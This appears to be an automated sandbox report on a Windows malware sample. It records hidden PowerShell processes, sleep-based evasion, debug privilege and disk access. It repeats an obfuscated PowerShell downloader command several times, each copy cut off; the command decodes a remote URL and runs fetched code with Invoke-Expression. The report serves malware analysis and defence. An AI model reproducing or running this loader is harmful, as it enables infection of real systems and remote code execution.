Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9274
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 676
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2665
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7214

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840	Thread sleep count: 9274 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840	Thread sleep count: 676 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6304	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704	Thread sleep count: 2665 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4888	Thread sleep count: 7214 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6440	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$pukka='drillevorn';;$additionstegnenes='drftede165';;$neri='thebain';;$asteroidens='outsling';;$daarskab='calamopitys';;$gastons=$host.name;function galskaber65($paretically){if ($gastons) {$chemiuserzation191=5} for ($thinkings=$chemiuserzation191;;$thinkings+=6){if(!$paretically[$thinkings]) { break }$kondenseringerne+=$paretically[$thinkings]}$kondenseringerne}function bearbejdeligste($fagidioternes){ .($medunderskriv) ($fagidioternes)}$succinctory46=galskaber65 'restinmediteingm.tm.tho. drifwelskoe hjembtelefcirreclbowleilasereancylnsaurut';$hjulpiskere=galskaber65 'inde,m gardo s adzekspristrumlstr.plsliksastrel/';$wiggas=galskaber65 'elbilt,ontrlrygdkstrlso1arn s2';$husholderisk='egne [invirnsu ple pr gtteg o.hjspnsbirdleskg,rrtilgivdiapai gawgcfor iegrshopfr boo iarii fo onlang tudsyrmlivsfachartnbajonapo.ygginoffedo.inrelekt]hydr :udnyt: tidsssk riev nfuccnemiu k ncruni.ei.uesttautopyskrifpsge rr sphao esudtomskiokonstcshrieounspelre da= arme$udpumwstrewi a.ndgteknogstal abu.kes';$hjulpiskere+=galskaber65 's bar5forpl.ligus0rhapo ganga( kultw unw ivinstngnetadrebutopectowm zzlsmarke h,emmnekspot ysse mana1cerva0h eml.overc0aftwa;pre t frivowtrussi pl mn acif6 ni h4digre; pela avocaxl ftn6 sa.o4mesot;blaat f gtnr d,sqv .ont:trolo1monoc3revei1 sp c. or m0hyper) jaev revergv ndierappocfunktkgrutno rest/ marc2dowha0bivaa1fod n0pili.0tivol1redif0 berb1hypos pa af e,oti ultrgenite forsfvaluto injux red/ util1krkli3 frey1sa.di.afgr 0';$vampirish=galskaber65 ' psycu blacstegneenatter op.a-misemaf lklgskrmbepharynrodent';$stokken=galskaber65 'elekth sandtnef,nt subvp digishaema:holda/ orbi/ kovsc ansvousk.dhunbuyatiff bhype imessatm onlabefaliresepsanden.silkerhaveeukolle.stttec untiosiphomtecto/h ghvc,orsts hvedsschin- ekos/degeromerckvserveebanker forls lfoop eseehovedifaeposbe.rakec.ocemaled.preo audskrskvabad si s>drifthorkant wh mtmalispnonalsimams:frem /met i/indvenusel rtegnk.fitchyrestiy stran ulkodcaprizg oseq pa e2 mulc. nonis stuba thed. iskcchuckotot mmmicro/pictuc colugbetweisolid_dili,bca diinoninnvrd.h/lnk rops,udvnarc enoni r ndrisbankfof.rreenonrhiu stys lea kvideoe unge. nisaa matrs uns d';$dogwinkle=galskaber65 'bivua>';$medunderskriv=galskaber65 'udskriplie,e,iskex';$overspille='secco';$blossoms='\suspendibility.lum';bearbejdeligste (galskaber65 'sojas$misgugal mnl detaomet lbflsenabrierl,ugnl: empod dskio hegugrustnmstopkapsychtstr kifil isprocemis ndeanathrjazzb= rdle$aroineupheanrevelv,tjer:creneaforhaptristp lossdfiletasupertforseaforbr+bidra$bjergbgoy,mlunreqoskomastredisde,mnoflowcmvellas');bearbejdeligste (galskaber65 'un.lo$unbrigclauslinforopapirbmas.iaun erlmodfa:tiaaro c rymrapshf,nkilap pulnhyletgglosasbrunibrhklueb,rgedflammmaccrum .inieankyll garrsforbie nandna,tob=latti$optigsstjmatkejseobushrk nathkres teaflasn spal.s utts untwpsig elde,eniglistticoni(grop,$lyn hd de.rouds jg.fsenwfa rdikj.rsnamtsvkbruttl a ahe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$pukka='drillevorn';;$additionstegnenes='drftede165';;$neri='thebain';;$asteroidens='outsling';;$daarskab='calamopitys';;$gastons=$host.name;function galskaber65($paretically){if ($gastons) {$chemiuserzation191=5} for ($thinkings=$chemiuserzation191;;$thinkings+=6){if(!$paretically[$thinkings]) { break }$kondenseringerne+=$paretically[$thinkings]}$kondenseringerne}function bearbejdeligste($fagidioternes){ .($medunderskriv) ($fagidioternes)}$succinctory46=galskaber65 'restinmediteingm.tm.tho. drifwelskoe hjembtelefcirreclbowleilasereancylnsaurut';$hjulpiskere=galskaber65 'inde,m gardo s adzekspristrumlstr.plsliksastrel/';$wiggas=galskaber65 'elbilt,ontrlrygdkstrlso1arn s2';$husholderisk='egne [invirnsu ple pr gtteg o.hjspnsbirdleskg,rrtilgivdiapai gawgcfor iegrshopfr boo iarii fo onlang tudsyrmlivsfachartnbajonapo.ygginoffedo.inrelekt]hydr :udnyt: tidsssk riev nfuccnemiu k ncruni.ei.uesttautopyskrifpsge rr sphao esudtomskiokonstcshrieounspelre da= arme$udpumwstrewi a.ndgteknogstal abu.kes';$hjulpiskere+=galskaber65 's bar5forpl.ligus0rhapo ganga( kultw unw ivinstngnetadrebutopectowm zzlsmarke h,emmnekspot ysse mana1cerva0h eml.overc0aftwa;pre t frivowtrussi pl mn acif6 ni h4digre; pela avocaxl ftn6 sa.o4mesot;blaat f gtnr d,sqv .ont:trolo1monoc3revei1 sp c. or m0hyper) jaev revergv ndierappocfunktkgrutno rest/ marc2dowha0bivaa1fod n0pili.0tivol1redif0 berb1hypos pa af e,oti ultrgenite forsfvaluto injux red/ util1krkli3 frey1sa.di.afgr 0';$vampirish=galskaber65 ' psycu blacstegneenatter op.a-misemaf lklgskrmbepharynrodent';$stokken=galskaber65 'elekth sandtnef,nt subvp digishaema:holda/ orbi/ kovsc ansvousk.dhunbuyatiff bhype imessatm onlabefaliresepsanden.silkerhaveeukolle.stttec untiosiphomtecto/h ghvc,orsts hvedsschin- ekos/degeromerckvserveebanker forls lfoop eseehovedifaeposbe.rakec.ocemaled.preo audskrskvabad si s>drifthorkant wh mtmalispnonalsimams:frem /met i/indvenusel rtegnk.fitchyrestiy stran ulkodcaprizg oseq pa e2 mulc. nonis stuba thed. iskcchuckotot mmmicro/pictuc colugbetweisolid_dili,bca diinoninnvrd.h/lnk rops,udvnarc enoni r ndrisbankfof.rreenonrhiu stys lea kvideoe unge. nisaa matrs uns d';$dogwinkle=galskaber65 'bivua>';$medunderskriv=galskaber65 'udskriplie,e,iskex';$overspille='secco';$blossoms='\suspendibility.lum';bearbejdeligste (galskaber65 'sojas$misgugal mnl detaomet lbflsenabrierl,ugnl: empod dskio hegugrustnmstopkapsychtstr kifil isprocemis ndeanathrjazzb= rdle$aroineupheanrevelv,tjer:creneaforhaptristp lossdfiletasupertforseaforbr+bidra$bjergbgoy,mlunreqoskomastredisde,mnoflowcmvellas');bearbejdeligste (galskaber65 'un.lo$unbrigclauslinforopapirbmas.iaun erlmodfa:tiaaro c rymrapshf,nkilap pulnhyletgglosasbrunibrhklueb,rgedflammmaccrum .inieankyll garrsforbie nandna,tob=latti$optigsstjmatkejseobushrk nathkres teaflasn spal.s utts untwpsig elde,eniglistticoni(grop,$lyn hd de.rouds jg.fsenwfa rdikj.rsnamtsvkbruttl a ahe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$pukka='drillevorn';;$additionstegnenes='drftede165';;$neri='thebain';;$asteroidens='outsling';;$daarskab='calamopitys';;$gastons=$host.name;function galskaber65($paretically){if ($gastons) {$chemiuserzation191=5} for ($thinkings=$chemiuserzation191;;$thinkings+=6){if(!$paretically[$thinkings]) { break }$kondenseringerne+=$paretically[$thinkings]}$kondenseringerne}function bearbejdeligste($fagidioternes){ .($medunderskriv) ($fagidioternes)}$succinctory46=galskaber65 'restinmediteingm.tm.tho. drifwelskoe hjembtelefcirreclbowleilasereancylnsaurut';$hjulpiskere=galskaber65 'inde,m gardo s adzekspristrumlstr.plsliksastrel/';$wiggas=galskaber65 'elbilt,ontrlrygdkstrlso1arn s2';$husholderisk='egne [invirnsu ple pr gtteg o.hjspnsbirdleskg,rrtilgivdiapai gawgcfor iegrshopfr boo iarii fo onlang tudsyrmlivsfachartnbajonapo.ygginoffedo.inrelekt]hydr :udnyt: tidsssk riev nfuccnemiu k ncruni.ei.uesttautopyskrifpsge rr sphao esudtomskiokonstcshrieounspelre da= arme$udpumwstrewi a.ndgteknogstal abu.kes';$hjulpiskere+=galskaber65 's bar5forpl.ligus0rhapo ganga( kultw unw ivinstngnetadrebutopectowm zzlsmarke h,emmnekspot ysse mana1cerva0h eml.overc0aftwa;pre t frivowtrussi pl mn acif6 ni h4digre; pela avocaxl ftn6 sa.o4mesot;blaat f gtnr d,sqv .ont:trolo1monoc3revei1 sp c. or m0hyper) jaev revergv ndierappocfunktkgrutno rest/ marc2dowha0bivaa1fod n0pili.0tivol1redif0 berb1hypos pa af e,oti ultrgenite forsfvaluto injux red/ util1krkli3 frey1sa.di.afgr 0';$vampirish=galskaber65 ' psycu blacstegneenatter op.a-misemaf lklgskrmbepharynrodent';$stokken=galskaber65 'elekth sandtnef,nt subvp digishaema:holda/ orbi/ kovsc ansvousk.dhunbuyatiff bhype imessatm onlabefaliresepsanden.silkerhaveeukolle.stttec untiosiphomtecto/h ghvc,orsts hvedsschin- ekos/degeromerckvserveebanker forls lfoop eseehovedifaeposbe.rakec.ocemaled.preo audskrskvabad si s>drifthorkant wh mtmalispnonalsimams:frem /met i/indvenusel rtegnk.fitchyrestiy stran ulkodcaprizg oseq pa e2 mulc. nonis stuba thed. iskcchuckotot mmmicro/pictuc colugbetweisolid_dili,bca diinoninnvrd.h/lnk rops,udvnarc enoni r ndrisbankfof.rreenonrhiu stys lea kvideoe unge. nisaa matrs uns d';$dogwinkle=galskaber65 'bivua>';$medunderskriv=galskaber65 'udskriplie,e,iskex';$overspille='secco';$blossoms='\suspendibility.lum';bearbejdeligste (galskaber65 'sojas$misgugal mnl detaomet lbflsenabrierl,ugnl: empod dskio hegugrustnmstopkapsychtstr kifil isprocemis ndeanathrjazzb= rdle$aroineupheanrevelv,tjer:creneaforhaptristp lossdfiletasupertforseaforbr+bidra$bjergbgoy,mlunreqoskomastredisde,mnoflowcmvellas');bearbejdeligste (galskaber65 'un.lo$unbrigclauslinforopapirbmas.iaun erlmodfa:tiaaro c rymrapshf,nkilap pulnhyletgglosasbrunibrhklueb,rgedflammmaccrum .inieankyll garrsforbie nandna,tob=latti$optigsstjmatkejseobushrk nathkres teaflasn spal.s utts untwpsig elde,eniglistticoni(grop,$lyn hd de.rouds jg.fsenwfa rdi

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
